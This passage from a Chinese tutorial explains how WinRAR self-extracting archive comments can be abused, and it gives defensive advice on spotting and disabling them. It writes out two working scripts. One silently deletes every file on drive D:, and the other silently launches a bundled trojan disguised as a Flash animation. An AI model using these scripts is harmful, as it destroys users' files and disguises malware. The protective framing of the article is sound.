实例二：删除D盘所有文件

WinRAR的自解压命令有时也能做“坏事”。有时候我们在运行了从网上下载的自解压程序后，却发现D盘上的文件已经被删得一干二净，而且在回收站里也找不到痕迹。这是怎么回事？原因在于这个自解压文件的注释中被写入了如下代码：

Silent=1
path=d:\
delete=*.*

代码中的关键是path命令，它能为解压文件指定绝对路径。由于指定的是盘符的根目录，WinRAR便会使用delete命令直接删除该分区上的全部文件。不小心中了这种陷阱之后真是欲哭无泪呀！

严重警告：硬盘有价资料无价！以上自解压代码非常危险，如果进行试验，请先备份好硬盘上的重要文件，以防不测。

实例三：无声无息地启动任意程序

一直以来，我们都小心翼翼地在网上浏览，可还是中了木马。它究竟是怎么潜入我们的电脑中的呢？回想一下，是不是曾经下载并运行过某个Flash动画或者小游戏？也许问题就出在它们身上，有人恶意地将木马程序与它们捆绑在了一起。

假定一个自解压程序的注释里有如下代码：

tempmode
setup=fcy.exe
setup=frjj.exe
Silent=1
Overwrite=1

其中“frjj.exe”是一个正常的Flash动画的自运行文件，而“fcy.exe”就可能是一个木马程序。

这个自解压文件也许还被配上了一个漂亮的图标，使迷惑的效果更佳。在“自解压选项”对话框中的“文本和图标”标签页下，在下方的“从文件加载自解压文件图标”中，就可以更换自解压程序的图标(见图6)。



这样一来，毫无防备的我们就会误以为这个自解压程序是一个简单的Flash动画的自运行文件。双击运行之后，Flash动画开始播放，而木马程序也已经神不知鬼不觉地运行起来了。

看了上述的例子，是不是对WinRAR自解压命令的强大功能有了深刻的认识，同时也对其可能造成的危害惶恐不已？正所谓“害人之心不可有，防人之心不可无”，上述实例并不是要教大家如何害人，而是要让大家学会防范别人利用这些命令恶意破坏我们的计算机。在运行从网上下载的WinRAR自解压程序之前，首先查看一下它是否带有可疑的代码，方法是在其上面单击右键，选择“属性”，在对话框中切换到“注释”标签。而不双击运行，改为使用WinRAR对自解压程序进行解压，注释内的代码命令就不会得到执行了。

小提示：
在WinRAR主界面中选择菜单命令“选项→设置”，在“安全”标签页下选择全部选项，可以起到防范压缩包中危险文件的目的。